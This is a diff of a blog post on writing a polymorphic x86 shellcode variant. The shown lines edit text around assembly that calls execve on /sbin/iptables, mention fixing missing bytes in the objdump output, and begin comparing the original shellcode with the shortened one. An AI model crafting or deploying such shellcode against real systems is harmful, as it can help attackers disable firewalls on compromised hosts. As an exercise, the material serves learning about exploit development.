C-Brown/C-Brown.github.io/_posts/2019-03-05-Polymorphism-2.md

 push ebx            ; push /sbin/iptables
 mov ecx, esp        ; address stored as argument
 ```
-The last steps are to move 0xb into eax and interrupt (int 0x80).
-We can use edx since it is null to mov into eax just for a little variation, then mov 0xb into al and make our call
+The last steps are to move 0xb into EAX and interrupt (int 0x80).
+We can use EDX since it is already null to mov into EAX just for a little variation.
+Then mov 0xb into AL and make our syscall.
 ```nasm
 mov eax, edx
 mov al, 0xb
 int 0x80
 ```
 Let's build it and run it.
-Our objdump seems to be missing a few bytes in the string from /sbin/iptables.
-I had to go in a manuall insert the sb from sbin and the a from iptables, then it was successful.\
+The objdump seems to be missing a few bytes in the string from /sbin/iptables.
+I had to go in a manually insert the 'sb' from sbin and the 'a' from iptables, then it worked as expected.
+This may have been an issue with the objdump command that was provided in the video.
+It was mentioned that one of the cut command options can cause problems if the dump has large combinations of opcodes in 1 line.
+I went ahead and inserted the bytes on my own but may go back to see if changing the command a bit will get it to work at another time.

-It has reduced the shellcode by 26%!
+The final product has reduced the shellcode by 26%!
 Let's compare the shellcode side by side.
 ```nasm
 jmp short 0x23                                jmp short 0x15
 pop esi                                       pop ebx